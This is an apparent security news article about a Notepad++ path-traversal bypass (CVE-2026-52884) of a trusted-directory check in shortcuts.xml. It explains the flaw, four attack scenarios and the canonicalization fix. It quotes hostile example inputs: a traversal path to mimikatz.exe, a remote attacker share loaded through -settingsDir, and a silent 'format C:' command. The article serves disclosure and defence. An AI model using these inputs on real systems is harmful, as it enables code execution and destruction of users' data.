Notepad++ v8.9.6.1 — the version that was supposed to fix the shortcuts.xml command injection — still lets attackers run arbitrary code without a single warning dialog. CVE-2026-52884 carries a CVSS 7.8 and bypasses the trusted-directory check added in the CVE-2026-48800 patch because the check never bothers to canonicalize the path first.
Why a Simple Prefix Check Fails
The new isInTrustedDirectory() function in RunDlg.cpp does exactly what you'd expect from a first-draft security fix: it checks whether the path starts with a trusted directory like C:\Windows\System32\. Microsoft's PathIsPrefix() or a naive StartsWith() returns true for C:\Windows\System32\..\..\Users\[USER]\Downloads\mimikatz.exe because the first 20 characters are indeed C:\Windows\System32\. The ..\..\ traversal components are never resolved before the prefix match.
Consequence: the resolved path points to an untrained executable — but the check sees only the prefix. No warning, no confirmation, just silent execution.
Four Attack Scenarios You Should Worry About
Scenario 1 is the simplest: any process running under the same user can write to %APPDATA%\Notepad++\shortcuts.xml. Insert a command like C:\Windows\System32\..\..\Users\[USERNAME]\Downloads\mimikatz.exe and bind it to Alt+F1. Press the key — payload runs.
Scenario 2 is meaner: a malicious .lnk file can redirect Notepad++ to load a remote shortcuts.xml using -settingsDir=\\\attacker\share\config. The remote XML carries the path traversal bypass. The user thinks they're opening a text file; instead, they get code execution.
Scenario 3 exploits cloud sync (OneDrive, Dropbox). Compromise the cloud storage, inject the traversal into the user's synced shortcuts.xml, and wait for Notepad++ to reload.
Scenario 4 doesn't even need path traversal. cmd.exe and powershell.exe live in trusted directories. A shortcut command like cmd.exe /c format C: /fs:NTFS /q /y executes without a peep because the prefix check passes on C:\Windows\System32\cmd.exe.
The One-Line Fix
The advisory includes the correct fix: call PathCanonicalize() or GetFullPathNameW() on the input path before running the prefix check. Resolve .., ., and redundant separators first, then compare against the trusted directory list. That's it — one API call that would have prevented all four scenarios.
Donho, the maintainer, has patched this in v8.9.6.2. Anyone still on v8.9.6.1 should update immediately. The broader lesson: security patches that add a check without canonicalizing the input are not security patches — they're footnotes for the next CVE.
Source: Notepad++ Zero-Click RCE via Path Traversal (CVE-2026-52884)
Domain: github.com
Comments load interactively on the live page.